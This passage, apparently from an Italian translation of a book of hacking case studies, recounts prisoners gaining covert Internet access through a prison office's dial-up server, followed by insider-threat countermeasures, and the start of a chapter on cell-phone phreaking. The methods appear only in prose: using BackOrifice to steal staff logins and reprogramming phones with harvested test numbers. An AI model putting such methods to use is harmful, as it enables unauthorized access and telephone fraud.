so dopo l'orario di lavoro, poteva andare online soltanto duran- 
te il giorno, aspettando i momenti in cui tutti gli altri nell'ufficio 
sembravano troppo indaffarati per prestare attenzione a ciò che 
stava facendo. Servendosi di un trucco che gli permetteva di con- 
trollare un altro computer, collegò la sua macchina a quella usa- 
ta da un impiegato civile che lavorava di fronte a lui. Quando Puo- 
mo non c'era e sembrava che nessuno sarebbe entrato nella stan- 
za posteriore per un po’, Danny prendeva il controllo dell'altro 
computer, lo metteva online e lo configurava per scaricare i gio- 
chi o la musica che voleva sul server nell'angolo. 

Un giorno, proprio mentre stava andando online per scarica- 
re, qualcuno si presentò all'improvviso nell’area di lavoro di Danny: 
una guardia donna, sempre più sospettose e rispettose delle rego- 
le degli uomini, concordano Danny e William. Prima che potesse 
lasciare il controllo dell'altra macchina, gli occhi della guardia si 
dilatarono: si era accorta che il cursore si muoveva! Danny riuscì 
a terminare l'operazione. La guardia sbatté le palpebre, pensando 
probabilmente di esserselo immaginato, e se ne andò. 


La soluzione 
William ricorda ancora vividamente il giorno in cui Danny 
trovò la soluzione ai problemi di accesso a Internet che avevano 


entrambi. Al personale della cucina era permesso di portarsi i pa- 
sti nella sala da pranzo dei funzionari, dopo che questi avevano 
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finito e se ne erano andati. William faceva entrare di nascosto 
Danny per consumare “il miglior cibo” insieme a lui nella sala da 
pranzo, dove potevano parlare in privato. “Mi ricordo ancora il 
giorno in cui lo feci salire qui da me,” racconta William. “Mi dis- 
se: ‘So come possiamo farlo, B’. Mi chiamano così B, o Big B. E 
mi spiegò che cosa avremmo fatto.” 

Lidea di Danny era di mettere insieme due frammenti del 
puzzle: le linee telefoniche verso il mondo esterno — cui poteva 
accedere nel dipartimento dell'Agricoltura — e i computer di Wil- 
liam nella cucina. Propose un modo che gli avrebbe permesso di 
usare i computer e di collegarsi a Internet ogni volta che lo aves- 
sero voluto, in libertà e sicurezza. 


Ci sedevamo sempre nel retro del commissariato giocando con i com- 
puter. E pensai: “Se possiamo stare qui a giocare e non importa a nes- 
suno — alle guardie non importa, basta che facciamo il nostro lavoro 
— perché allora non possiamo collegarci a Internet da qui?”. 


L'ufficio agricoltura aveva computer più aggiornati perché, 
come spiega Danny, le altre prigioni dello stato “rassavano” nei 
loro server. Il termine “rassare” era un modo di dire per illustra- 
re che i computer delle altre prigioni si collegavano al server del- 
l'ufficio agricoltura, che era configurato per favorire queste con- 
nessioni dial-up con il software Ras (Servizi di accesso remoto) 
della Microsoft. 

Ora dovevano confrontarsi con un elemento determinante per 
la riuscita del progetto: imodem. “Ottenere i modem era una que- 
stione fondamentale,” racconta William. “Se li tenevano piutto- 
sto stretti. Ma riuscimmo a mettere le mani su un paio di essi.” 
Quando erano pronti ad andare online dal commissariato, “quel 
lo che facevamo era collegarci in dial-up alle linee interne della 
sezione e rassare nel dipartimento dell'Agricoltura”. 

Traduzione: dal commissariato i due davano al modem un co- 
mando per effettuare una chiamata su una linea telefonica in- 
‘terna. La telefonata veniva ricevuta da un altro modem, situato 
nel negozio della fattoria, che era collegato al server di Danny. 
Quel server si trovava sulla stessa rete locale di tutti gli altri com- 
puter nell'ufficio, alcuni dei quali avevano dei modem collegati 
alle linee telefoniche esterne. Con le reti locali del commissaria- 
to e dell'ufficio agricoltura che potevano vedersi tramite la linea 
telefonica interna, il comando successivo dettava a una delle mac- 
chine dell'ufficio agricoltura di collegarsi esternamente a Inter- 
net. Voila! Accesso immediato. 

Beh, non proprio. I due hacker avevano ancora bisogno di un 
account con un Internet Service Provider. Inizialmente usavano 
i nomi utente e le password del personale che lavorava nel di- 
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partimento, “quando sapevamo che erano fuori città per andare 
a caccia o qualcosa del genere”, dice Danny. Queste informazio- 
ni erano state raccolte installando sugli altri computer un softwa- 
re chiamato “BackOrifice”, un noto strumento di monitoraggio 
remoto, che permetteva loro di controllare un altro computer co- 
me se vi fossero seduti di fronte. 

Ovviamente, usare le password di altre persone era rischio- 
so, ci sono tanti modi in cui puoi essere scoperto. Questa volta 
fu William a trovare una soluzione: “Riuscii a far sì che fossero i 
miei genitori a pagarci l’accesso a Internet tramite una società di 
servizi locale”, così non fu più necessario usare le informazioni 
di log-in di altre persone. 

Finirono per avere la connessione a Internet tramite l’ufficio 
agricoltura ventiquattr'ore al giorno, sette giorni su sette. “Ave- 
vamo due server Fip che giravano lì scaricando film, musica, al- 
tri strumenti di hacking e tante altre cose,” dice Danny. “Riusci- 
vo ad avere dei giochi prima ancora che uscissero.” 


Quasi scoperti 


Nel loro quartier generale al commissariato, William installò 
delle schede audio e degli speaker in modo da poter ascoltare la mu- 
sica o una colonna sonora mentre guardavano un film scaricato. Se 
una guardia gli avesse chiesto che cosa stavano facendo, William 
gli avrebbe risposto: “Io non mi faccio gli affari tuoi, tu non farti i 
miei”. 


Ripetevo tutte le volte [alle guardie] che ci sono alcune cose nella vi- 
ta che posso promettere. Innanzitutto, non avrò mai una pistola e 
non sparerò mai a nessuno qui. Secondo, non farò uso di droghe e 
non mi deboscerò il cervello. Numero tre, non mi cercherò un pro- 
tettore e non diventerò un protettore. Numero quattro, non andrò a 
disturbare un ufficiale donna. 

Non potevo promettere che non avrei fatto a botte. Non ho mai men- 
tito. Loro rispettavano la mia onestà e la mia schiettezza, e così fa- 
cevano delle cose per me. Puoi riuscire a ottenere dei favori dalle 
guardie conversandoci. `. 

La conversazione governa la nazione. È parlando che convinci le 
donne a sfilarsi le mutande, capisci cosa dico, ed è parlando con gli 
uomini che li convinci a fare delle cose per te. 


Ma per quanto possa essere eloquente un prigioniero come 
oratore, non esistono guardie che gli consentano, con i computer 
e le linee telefoniche esterne, di regnare indisturbato. Così come 
è possibile che i due detenuti siano riusciti nelle loro scappatelle 
da hacker proprio sotto al naso delle guardie? Spiega William: 
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Potevamo fare un sacco di cose perché ci consideravano dei mezzi 
geni. Stiamo nel bel mezzo della terra dei bigotti, così i boss [le guar- 
die] non avevano la minima idea di quello che stavamo facendo. Non 
potevano neanche immaginare ciò di cui eravamo capaci. 


Un'altra ragione dovrebbe essere che questi due detenuti la- 
voravano al computer meglio di altri pagati per occuparsene. “La 
maggior parte delle persone impiegate lì, dovevano in teoria co- 
noscere cose come i computer,” dice William, “ma non ne erano 
capaci, così erano i detenuti a occuparsene.” 

Questo libro è pieno di storie sul caos e sui danni prodotti da- 
gli hacker, ma William e Danny non erano intenzionati ad attua- 
re truffe di rilevanza penale. Volevano semplicemente accresce- 
re le loro capacità informatiche e divertirsi. Cosa che, date le cir- 
costanze, non è difficile da capire. Per William è importante che 
la gente capisca la differenza: 


Non ne abbiamo mai abusato o ferito nessuno. Mai. Voglio dire dal 
mio punto di vista, ritenevo necessario imparare quello che volevo 
imparare in modo che potessi comportarmi rettamente e ottenere 
dei risultati positivi una volta rilasciato. 


Se i funzionari della prigione del Texas rimasero all’oscuro di 
quanto stava accadendo, furono fortunati che William e Danny 
fossero mossi da motivazioni benevole. Immaginate i disastri che 
i due avrebbero potuto produrre; sarebbe stato un gioco da ra- 
gazzi per loro sviluppare un piano per ottenere dei soldi o delle 
proprietà da vittime che non sospettavano nulla. Internet era di- 
ventata la loro università e il loro campo di gioco. Imparare co- 
me organizzare truffe contro privati o intrusioni nei siti delle cor- 
poration sarebbe stato facile; gli adolescenti e i bambini appren- 
dono questi metodi ogni giorno dai siti degli hacker e altrove sul 
web. E come prigionieri, Danny e William avevano tutto il tem- 
po del mondo. 

Forse c'è una lezione da imparare qui: erano due assassini in 
carcere, ma ciò non significa che fossero feccia, marci fino al mi- 
dollo. Erano dei truffatori che avevano inventato un modo per 
collegarsi a Internet illegalmente, ma ciò non significava che vo- 
lessero ingannare delle persone innocenti o delle aziende inge- 
nuamente poco sicure. 


La scappatoia 


A ogni modo, i due hacker in erba non avevano lasciato che 
le piacevoli distrazioni dell’intrattenimento via Internet rallen- 
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tassero il loro apprendimento. “Riuscivo ad avere i libri che vo- 
levo dalla mia famiglia,” dice William, che riteneva le sue scap- 
patelle una forma di addestramento pratico assolutamente ne- 
cessaria. 


Volevo capire la meccanica intricata di una rete Tcp/Ip. Avevo biso- 
gno di quel tipo di conoscenza per quando sarei uscito. 

Era un'educazione ma era anche divertente, capisci quello che vo- 
glio dire? Era divertente perché sono un tipo di personalità di serie 
A, mi piace vivere sempre al massimo. Ed era un modo per sfidare 
le guardie. Perché non ne avevano la più pallida idea. 


Al di là degli aspetti seri e faceti del loro uso di Internet, Danny 
e William trovarono anche degli stimoli nel socializzare. Avvia- 
rono un'amicizia elettronica con alcune donne, incontrandole in 
chat e comunicandoci via e-mail. Con alcune, ammisero di tro- 
varsi in prigione; con la maggior parte, evitarono di citare il fat- 
to. Il che non sorprende. 

Vivere al massimo può rinvigorirti, ma comporta sempre un 
terribile rischio. William e Danny non potevano mai smettere di 
guardarsi le spalle. 

“Una volta quasi ci beccarono,” ricorda William. “Fu uno de- 
gli ufficiali che non ci piaceva perché era un vero paranoico. Non 
ci piaceva collegarci mentre era al lavoro.” 

Questa guardia un giorno chiamò il commissariato e scoprì 
che la linea era sempre occupata. “Lo aveva spaventato il fatto 
che uno degli uomini che lavoravano in cucina aveva iniziato ad 
avere una relazione con un’infermiera della clinica della prigio- 
ne.” La guardia sospettava che il prigioniero, George, stesse oc- 
cupando la linea con una telefonata non autorizzata alla sua fi- 
danzata. In realtà, la linea era intasata perché William stava usan- 
do Internet. La guardia era corsa al commissariato. “Sentimmo 
la chiave entrare nel cancello e capimmo che qualcuno stava ar- 
rivando. Spegnemmo tutto.” 

Quando la guardia entrò, William stava copiando dei rapporti 
sul computer e Danny fece un'espressione innocente. La guardia 
pretese di sapere perché la linea telefonica era stata occupata co- 
sì a lungo. William si era preparato e gli imbastì una storia sulla 
necessità che aveva avuto di fare una telefonata per ottenere del- 
le informazioni sul rapporto su cui stava lavorando: 


Non potevamo avere una linea esterna da lì dietro, e lui lo sapeva, 
ma il tipo era semplicemente superparanoico. Pensò che in qualche 


modo avevamo aiutato George a chiamare la sua fidanzata. 


Che credesse o meno alla storia di William, senza prove la 
guardia non poteva fare niente. George in seguito sposò l'infer- 
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miera; da.quanto ne sa William, è ancora in prigione e ancora fe- 
licemente sposato. 


Crescendo 


Come può un giovane come William — un ragazzino con una 
dimora stabile e dei genitori che si prendono cura di lui e lo so- 
stengono — finire in prigione? “Gli anni della mia crescita furono 
ottimi. Ero uno studente che prendeva sempre C, ma molto in gam- 
ba. Non ho mai giocato a football e altre cose di quel genere, ma 
non ho mai avuto problemi finché non sono andato al college.” 

Essere educato come un battista degli stati del Sud non fu 
un'esperienza positiva per William. Oggi sente che la religione uf- 
ficiale può danneggiare l'autostima di un giovane. “Sai com'è, sin 
dal principio ti insegnano che non vali niente.” Attribuisce le sue 
scelte prive di valore al fatto che si era convinto di non poterce- 
la fare nella vita. “Capisci, dovevo pure guadagnare il rispetto e 
la stima di me stesso da qualche parte e lo feci con persone che 
avevano paura di me.” 

Da studente di filosofia, William capisce ciò che Friedrich Nietz- 
sche voleva dire con il concetto di “metamorfosi dello spirito”: 


Non so se hai mai letto Nietzsche, ma lui parlava del cammello, del 
leone e del bambino. E io ero veramente un cammello, facevo ciò 
che pensavo avrebbe reso felice la gente per guadagnarmi l’autosti- 
ma dall’apprezzamento delle persone, anziché volermi bene e sor- 
reggermi personalmente. 


Ciononostante, William superò le scuole superiori con risul- 
tati impeccabili. I suoi problemi iniziarono quando si iscrisse a 
un college nelle vicinanze di Houston, e poi si trasferì in una scuo- 
la in Louisiana per studiare aviazione. L'istinto di piacere agli al- 
tri si trasformò in un bisogno di rispetto: 


Vidi che potevo fare soldi vendendo ecstasy e così via. Le persone 
avevano paura di me perché ero sempre armato e sempre pronto a 
battermi, e mi capisci, a vivere la vita di un idiota. E poi mi ritrovai 
in un affare di droga finito male. 


Lui e il suo cliente finirono per impuntarsi e a scontrarsi su 
chi avesse ragione. Arrivò il socio del cliente; erano due contro 
uno e William capì che avrebbe dovuto fare un gesto disperato 
altrimenti non sarebbe mai uscito di lì. Tirò fuori la pistola e 
sparò. E l'uomo rimase a terra. 

Come affronta una realtà così dura un uomo che viene da una 
famiglia forte e stabile? Come comunica una notizia così terribile? 
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Una delle cose più difficili della mia vita fu dire a mia madre che l'a- 
vevo fatto. Sì, fu davvero dura. 


William ha avuto molto tempo per riflettere su cosa lo ab- 
bia portato in prigione. Non se la prende con nessuno eccetto 
se stesso. “Capisci, sono state solo le scelte che feci perché la 
mia autostima era a pezzi. E non aveva nulla a che fare con i 
miei genitori perché mi avevano cresciuto nel modo che rite- 
nevano giusto.” 

Per Danny, tutto andò storto in una sola notte: 


Ero solo uno stupido ragazzino. La sera dei miei diciotto anni, mi or- 
ganizzarono una grande festa. Sulla via del ritorno, un paio di ragaz- 
ze dovevano andare al bagno, così mi fermai davanti a un ristorante. 
Quando uscirono, avevano un paio di tipi alle costole che le stava- 
no importunando. Uscimmo dalla macchina in gruppo e ci fu una 
grossa rissa, e prima che fosse finita, investii uno di loro. 

Poi entrai nel panico e ce ne andammo in macchina. Mi allontanai 
dal posto. 


Era la sindrome di Richard Nixon e Martha Stewart: non vo- 
ler fare un passo avanti per assumersi la responsabilità delle pro- 
prie azioni. Se Dan non fosse fuggito con la macchina, l'accusa 
sarebbe stata con ogni probabilità omicidio colposo. La fuga dal- 
la scena del delitto aggravò la situazione e una volta che fu rin- 
tracciato e arrestato era troppo tardi per chiunque per credere 
che fosse stato un incidente. 


Ritorno al mondo libero 


William aveva scontato un quarto della sua condanna a 
trent'anni, ma non stava facendo alcun progresso durante le com- 
parizioni annuali di fronte alla Commissione per la semilibertà. 
Ma la sua capacità di assumere l'iniziativa tornò alla ribalta. Ini- 
ziò così a scrivere delle lettere alla Commissione per la semili- 
bertà; una lettera ogni due settimane, con una copia indirizzata 
personalmente a ciascuno dei tre membri della Commissione. Le 
lettere descrivevano in dettaglio quello che stava facendo di co- 
struttivo: “I corsi che stavo seguendo, i voti che prendevo, i libri 
di informatica che leggevo e così via”, dimostrando che “non ero 
frivolo e non stavo sprecando il mio tempo”. | 

Racconta: “Uno dei membri disse a mia madre: ‘Ricevo più 
lettere da lui che dai miei sei figli messi insieme’”. Funzionò: con- 
tinuò a farlo per quasi un anno e alla sua comparizione succes- 
siva lo fecero uscire. Danny, che aveva una condanna più breve, 
fu rilasciato più o meno nello stesso periodo. 
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Da quando hanno lasciato la prigione sia Danny sia William 
vivono fieramente determinati a tenersi fuori dai guai, lavoran- 
do grazie alle competenze acquisite durante gli anni passati den- 
tro. Se è vero che entrambi hanno seguito dei corsi di tecnolo- 
gia di livello universitario in prigione, sono tutti e due convinti 
che fu la loro esperienza pratica, per quanto pericolosa, a dare 
loro le competenze avanzate da cui oggi dipende il loro sosten- 
tamento. 

In prigione Danny guadagnò sessantaquattro ore di crediti di 
livello universitario e anche se non riuscì a ottenere dei certifi- 
cati professionali, adesso lavora con applicazioni potenti e im- 
portanti come Access e Sap. 

Prima della prigione, William aveva completato il suo anno di 
noviziato al college ed era entrato nel secondo grazie al sostegno 
dei suoi genitori. Una volta uscito, riprese gli studi: “Feci doman- 
da per il sostegno finanziario, lo ottenni e andai a scuola. Prende- 
vo tutte A e lavoravo anche nel centro informatico della scuola”. 

Adesso ha due lauree da associato — in cultura generale e nel- 
la manutenzione delle reti telematiche - pagate entrambe trami- 
te delle borse di studio. Nonostante le due lauree, William non 
ha avuto la stessa fortuna di Danny nel trovare un lavoro da infor- 
matico. Così ha preso quello che ha potuto trovare, accettando 
un posto che comportava del lavoro fisico. Bisogna ringraziare 
la sua determinazione e la mentalità aperta del suo datore di la- 
voro: non appena l'azienda ha riconosciuto le sue capacità infor- 
matiche, è stato dispensato dalle mansioni fisiche e messo a svol- 
gere un lavoro in cui impiega meglio le sue qualifiche tecniche. 
E un lavoro informatico di contabilità di routine - non la pro- 
gettazione di reti che preferirebbe fare -~ ma soddisfa questo bi- 
sogno nei fine settimana trovando delle modalità a basso costo 
per mettere in rete i sistemi informatici di due chiese nella zona 
di Houston, come volontario. 

Questi due uomini sono eccezioni. In quella che è una delle sfi- 
de più urgenti e meno discusse che si pongono dinanzi alla società 
‘ americana di oggi, la maggior parte dei criminali scarcerati deve 
affrontare una corsa a ostacoli quasi impossibile per trovare un la- 
voro, in particolare un lavoro che dia loro uno stipendio sufficiente 
a mantenere una famiglia. E si capisce il perché: quanti datori di 
lavoro possono sentirsi tranquilli all'idea di assumere un assassi- 
no, un rapinatore, uno stupratore? In molti stati, non possono ri- 
cevere neanche i benefici del welfare e così rimangono loro poche 
strade per mantenersi mentre continuano la ricerca quasi dispe- 
rata di un lavoro. Le opzioni a loro disposizione sono decisamen- 
te limitate: e poi ci chiediamo perché in tanti ritornano così rapi- 
damente in carcere e diamo per scontato che sia perché manchi 
loro la volontà di vivere rispettando le regole. 
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Oggi William ha qualche consiglio concreto da dare ai gio- 
vani e ai loro genitori: 


Non credo si possa dire alcunché ai giovani per farli cambiare, se 
non di credere in se stessi, sai, e di non prendere mai delle scorcia- 
toie, perché la strada lunga è sempre quella che dà maggiori soddi- 
sfazioni alla fine. E capisci, non te ne stare mai con le mani in ma- 
no perché non ti senti abbastanza forte per fare quello che hai bi- 
sogno di fare. 


E Danny sarebbe senza alcun dubbio d'accordo con queste 
parole di William: 


Adesso non scambierei la mia vita con niente al mondo. Sono arri- 
vato a credere che posso aprirmi una strada nella vita per merito 
mio e senza prendere scorciatoie. Negli anni ho imparato che pote- 
vo farmi rispettare dalle persone per le mie qualità. Questo è il mo- 
do in cui cerco di vivere oggi. 


Riflessioni 


La storia di William e Danny mette in luce come molti attac- 
chi informatici vengono condotti con modalità contro cui i fi- 
rewall non possono nulla: il furfante non è un giovane hacker o 
un ladro con buone capacità informatiche, ma un interno, un im- 
piegato scontento, un lavoratore amareggiato licenziato da poco 
o — come in questo caso — un gruppo di insider che hanno i loro 
motivi e scopi particolari. 

Molti casi registrati dimostrano che gli insider spesso rap- 
presentano una minaccia più grande degli intrusi di cui abbia- 
mo letto nei giornali. Mentre la maggior parte dei controlli di si- 
curezza si concentra sulla protezione del perimetro contro l’at- 
taccante esterno, è insider ad avere accesso all’equipaggiamen- 
to fisico ed elettronico, alla cablatura, alle centraline telefoniche, 
alle workstation e alle prese di rete. Senza una procedura di si- 
curezza efficace — che comprenda un regolamento di sicurezza, 
la verifica, l'attuazione, il monitoraggio e altri controlli delle pra- 
tiche aziendali — un dipendente corrotto può danneggiare la rete 
interna della corporation sin troppo facilmente. 

Un altro aspetto della loro storia mi ricorda il film Le ali del- 
la libertà. Un prigioniero di nome Andy è un fiscalista; alcune 
delle guardie gli fanno preparare le loro dichiarazioni dei red- 
diti e lui dà dei consigli sul modo migliore per organizzare le lo- 
ro finanze e limitare le responsabilità fiscali. Le competenze di 
Andy divengono ampiamente note tra gli addetti della prigione, 
portandolo a lavorare sui bilanci della prigione verso livelli am- 
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ministrativi sempre maggiori, finché alla fine non riesce a de- 
nunciare il direttore del carcere che ha falsificato i bilanci. Non 
solo in prigione, ma ovunque, dobbiamo essere tutti attenti e 
prudenti nei confronti delle persone cui diamo delle informa- 
zioni riservate. 

Nel mio caso, il Marshal Service degli Stati Uniti," aveva crea- 
to un alto livello di paranoia sulle mie capacità. Inserirono un av- 
vertimento nella mia scheda che avvisava gli ufficiali della pri- 
gione di non rivelarmi informazioni personali, neanche i loro no- 
mi. Prendevano alla lettera le voci incontrollate secondo cui ero 
in grado di infiltrarmi nella pletora dei database segreti del go- 
verno e cancellare l'identità di chiunque, compreso un maresciallo 
federale. Credo che avessero visto troppe volte il film The Net. 


Contromisure 


Gli eventi descritti in questa storia si sono verificati in un am- 
biente chiuso e altamente controllato: anche un’'organizzazione 
militare non supervisiona le attività dei suoi membri in modo co- 
sì stretto come i detenuti di una prigione. O così pensano tutti, 
compresi gli addetti stessi della prigione. 

Se la maggior parte delle precauzioni che avrebbero preve- 
nuto questo hack si basa sullo stesso insieme di principi che si 
applicano a ogni genere di impresa (e vengono enumerati altro- 
ve in questo libro), alcuni sono specifici o di particolare impor- 
tanza per un ambiente carcerario. Tra i più significativi, ricor- 
diamo: 


e Etichettate chiaramente i computer e le periferiche che so- 
no collegate all’esterno o che contengono o permettono l’acces- 
so a informazioni che i prigionieri non dovrebbero vedere con la 
scritta “Uso riservato al personale”. Tra queste vi sono, per esem- 
pio, tutte le informazioni personali su guardie e addetti, i registri 
di pagamento dei salari, i registri dei prigionieri e le piante del- 
la prigione (compresi i dettagli dei sistemi di aerazione e affini 
che potrebbero essere usati per dei tentativi di evasione). 

e Etichettate chiaramente gli altri computer con la scritta “A 
uso del detenuto”. 

e Mantenete un inventario accurato di tutti i computer, le pe- 
riferiche e la componentistica per computer. Sviluppate un si- 


! L'United States Marshals Service fa parte del dipartimento di Giustizia ed 
è la più vecchia agenzia per l'applicazione delle leggi degli Stati Uniti. Il suo com- 
pito è di proteggere i tribunali federali e garantire il corretto funzionamento del- 
la macchina giudiziaria. [N.d.7.] 
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stema per rintracciare la proprietà di questi prodotti che com- 
prenda, dove possibile, un numero identificativo masterizzato o 
inciso su ciascuno di loro. Assicuratevi che i detenuti non pos- 
sano acquisire computer, parti di computer o altri prodotti affi- 
ni (soprattutto modem), a eccezione di quanto richiesto per la 
realizzazione di compiti autorizzati e solo quando supervisiona- 
ti in modo appropriato. 

o Permettete ai detenuti di dare una mano nel lavoro di am- 
ministrazione della prigione che comporta l’uso di un computer, 
solo se il loro lavoro può essere strettamente supervisionato da 
un membro dello staff sufficientemente esperto di tecnologia per 
effettuare una supervisione appropriata. 

o Assegnate ai membri tecnici del personale il compito di con- 
durre controlli periodici dei computer a disposizione dei dete- 
nuti per confermare che non siano stati modificati impropria- 
mente. In particolare, queste ispezioni dovrebbero verificare che 
le macchine non abbiano delle connessioni Ethernet, dispositivi 
wireless o modem annessi, e che non vi siano installati software 
a eccezione di quelli autorizzati. I membri dello staff che condu- 
cono queste ispezioni hanno bisogno di conoscere i metodi per 
individuare i software che sono invisibili o progettati per fun- 
zionare in modalità “invisibile”. E inoltre necessario condurre 
una ricerca periodica dei dispositivi per l’accesso senza fili (una 
minaccia recente e crescente nel mondo wireless di oggi). 

e Usate software che limitino i computer all'esecuzione di 
compiti e funzioni specifiche. (A questo scopo, l'Ufficio federale 
delle prigioni era solito usare, e potrebbe ancora usare, un pro- 
dotto chiamato Watchdog.) 

e Tenete tutti i computer, e in particolare le macchine a uso 
esclusivo del personale, in luoghi fisicamente sicuri. 

e Stabilite un regolamento per la gestione delle password e 
richiedete l’uso di un salvaschermo con password o di un altro 
programma che blocchi elettronicamente la macchina a ecce- 
zione di quando viene utilizzata dall'utente. 

e Mettete a punto un processo per tenere il sistema operativo 
e gli applicativi software aggiornati con le ultime riparazioni e 
patch di sicurezza. Il software antivirus ovviamente, ma anche al- 
tri programmi che rilevano i vari tipi di spyware e tutti quelli che 
possono assumere di nascosto il controllo remoto del computer. 


Conclusioni 
In alcune situazioni, il senso comune ci dice che prendere del- 


le precauzioni sofisticate per la sicurezza è una perdita di tem- 
po. In una scuola di addestramento militare per esempio, non ci 
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si aspetta che tra gli studenti vi siano molte persone che non at- 
tendono altro che la prima occasione per barare o per violare le 
regole. In una scuola elementare, non ci si aspetta che un bam- 
bino di dieci anni ne sappia di più di sicurezza informatica del 
guru tecnologico del personale della scuola. 

E in una prigione, non ci si aspetta che dei detenuti stretta- 
mente sorvegliati, che vivono osservando un insieme rigido di re- 
gole, possano reperire i mezzi non solo per trovare il modo di 
connettersi a Internet, ma anche per passare ore e ore di segui- 
to, un giorno dopo l’altro, a spassarsela con la musica, i film, le 
comunicazioni con le donne e un sempre maggiore apprendi- 
mento informatico. 

La morale: se siete responsabili della sicurezza informatica 
di una qualsiasi scuola, gruppo di lavoro, azienda o altra entità, 
qualsiasi cosa abbiate fatto sicuramente non è abbastanza. Con- 
tinuate a cercare le cose che vi sfuggono. Mi vengono in mente 
le parole “vigilanza eterna”. 
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4. 
Guardie e ladri 


Entrai nella classe piena di agenti di polizia e 
dissi: “Ragazzi, riconoscete qualcuno di questi 
nomi?”. Lessi una lista di nomi. Un agente fe- 
derale spiegò: “Sono giudici della Corte distret- 
tuale di Seattle”. E aggiunsi: “Bene, io ho un 
file di password con ventisei password cracca- 
te”. I federali presenti diventarono quasi verdi. 


Don Boelling, Boeing Aircraft 


Matt e Costa non avevano pianificato un attacco alla Boeing 
Aircraft. Aveva solo finito per esserlo. Ma il risultato di quello e di 
altri incidenti nella loro catena di azioni di hacking dovrebbe es- 
sere un monito. I due potrebbero essere i testimonial di una cam- 
pagna pubblicitaria per mettere in guardia altri hacker, troppo gio- 
vani per comprendere appieno le conseguenze delle loro azioni. 

Costa (pronunciato “Coast-uh”) Katsaniotis iniziò a familia- 
rizzare con i computer all’età di undici anni, quando gli fu rega- 
lato un Commodore Vic 20, che cominciò a programmare per mi- 
gliorarne le prestazioni. A quella tenera età realizzò anche un 
software che permetteva a un suo amico di collegarsi e vedere un 
elenco dei contenuti archiviati sul suo hard disk. “Quello fu il mo- 
mento in cui iniziai veramente ad avvicinarmi ai computer, e ad 
amare l'aspetto enigmatico del trovare le soluzioni per farli fun- 
zionare.” E non solo sul piano della programmazione. Matt mi- 
se anche le mani sull'hardware, senza preoccuparsi, dice, di per- 
dere le viti “perché avevo iniziato a smontare le cose da quando 
avevo tre anni”. 

Sua madre lo mandò a una scuola privata fino all'ottavo an- 
no e poi a una scuola pubblica. A quell’età i suoi gusti musicali 
oscillavano tra gli U2 (di cui acquistò il suo primo album e dei 
quali è ancora un fan appassionato), i Def Leppard e “altra mu- 
sica più pesante”; nel frattempo i suoi interessi per i computer si 
espandevano e includevano anche “capire quello che potevo fa- 
re con i numeri di telefono”. Un paio di ragazzi più grandi ave- 
vano imparato alcune cose sugli estensori degli 800-Wats, numeri 
telefonici che potevano essere usati per effettuare chiamate a lun- 
ga distanza gratuitamente. 

Costa amava i computer e li capiva in modo naturale. Forse 
l'assenza di un padre aumentava il suo interesse di adolescente per 
un mondo verso il quale poteva esercitare un controllo totale. 
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Poi alle superiori mi presi una specie di pausa e cercai di capire chi 
erano le ragazze. Ma avevo sempre la mia passione per i computer 
e li tenevo sempre a portata di mano. Non iniziai veramente a de- 
collare con l’hacking finché non ebbi un computer che poteva ge- 
stirlo, che fu il Commodore 128. 


Un giorno Costa incontrò Matt - Charles Matthew Anderson 
— su una Bbs dell’area dello stato di Washington. “Credo che ri- 
manemmo amici per circa un anno via telefono e tramite i mes- 
saggi che postavamo su diverse bacheche elettroniche, prima di 
incontrarci dal vivo.” Matt — il cui nick è Cerebrum - descrive la 
sua infanzia come “piuttosto normale”. Suo padre era un inge- 
gnere della Boeing e aveva un computer a casa che Matt era au- 
torizzato a usare. È facile immaginare che il padre fosse così po- 
co entusiasta delle preferenze musicali del ragazzo (“industrial e 
alcune cose più dark”) da non rendersi conto della strada peri- 
colosa che Matt stava prendendo con il computer. 


Iniziai a programmare in Basic quando avevo circa nove anni. Tra- 
scorsi gran parte della mia adolescenza sulla grafica e sulla musica 
al computer. Questa è una delle ragioni per cui i computer mi piac- 
ciono ancora oggi, smanettare con le cose multimediali è molto di- 
vertente. 

Cominciai a darmi da fare con hacking nell'ultimo anno delle su- 
periori, esplorando in particolare il phreaking, per imparare a sfrut- 
tare la rete telefonica usata dai professori e dagli amministratori per 
fare telefonate a lunga distanza. Erano cose che mi prendevano mol- 
to quando ero alle superiori. 


Matt finì le scuole superiori tra i primi dieci della sua classe, 
si iscrisse all’Università di Washington e iniziò a studiare infor- 
matica, in particolare i mainframe. Al college, con un account as- 
segnato su una macchina Unix, iniziò a studiare Unix, “serven- 
domi di informazioni trovate su alcune Bbs underground e su al- 
cuni siti”. 


Phreaking 


Dopo aver formato una squadra, Matt e Costa iniziarono a 
condursi l’un l’altro nella direzione sbagliata, sulla strada del- 
l'hackeraggio del sistema telefonico, un'attività conosciuta come 
“phreaking”. Una notte, ricorda Costa, i due si avventurarono in 
una spedizione che gli hacker chiamano “il tuffo nella spazzatu- 
ra”, rovistando nei rifiuti abbandonati all’esterno degli impianti 
di trasmissione delle compagnie telefoniche. “Nei cassonetti, tra 
i filtri del caffè e altre cose fetide, trovammo un elenco di tutti i 
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ripetitori e dei numeri di telefono per ciascuno di essi,” vale a di- 
re i numeri di telefono e il Numero seriale elettronico, o Esn, che 
è l’identificativo unico assegnato a ogni telefono cellulare. Come 
fossero due gemelli che ricordano un evento comune dell’infan- 
zia dandosi il cambio, Matt prosegue: “Erano numeri di test che 
i tecnici usano per testare la forza del segnale. Avevano cellulari 
speciali che funzionavano solo con quel ripetitore”. 

Iragazzi acquistarono cellulari Oki 900 e un apparecchio per 
masterizzare dei programmi nuovi nei chip dei cellulari. Ma non 
si limitarono a inserire nuovi numeri; già che vi si trovavano, in- 
stallarono anche un firmware speciale che permetteva loro di ri- 
programmare i cellulari con qualsiasi numero di telefono e di Esn 
volessero. Programmando i telefoni con i numeri speciali di test 
che avevano trovato, i due si regalarono un servizio telefonico 
cellulare gratuito. “L'utente sceglie il numero che vuole per fare 
una chiamata. Se avessimo dovuto, potevamo cambiare numero 
molto velocemente,” dice Costa. 

(Questo è ciò che chiamo “il piano tariffario cellulare di Ke- 
vin Mitnick”: zero dollari al mese, zero al minuto, ma potresti fi- 
nire per pagare un conto molto salato, se capisci cosa intendo.) 

Grazie alla riprogrammazione, Matt e Costa potevano fare 
tutte le telefonate che volevano in qualsiasi parte del mondo; se 
fossero mai state registrate, sarebbero risultate sui libri contabi- 
li sotto la voce affari ufficiali della compagnia. Niente accuse, 
niente domande. La modalità ideale per ogni phreaker o hacker. 


Entrare in tribunale 


Finire in tribunale è l’ultima cosa che un hacker vorrebbe, co- 
me so fin troppo bene. Hackerando insieme, Costa e Matt fini- 
rono presto in tribunale, ma in un senso differente. 

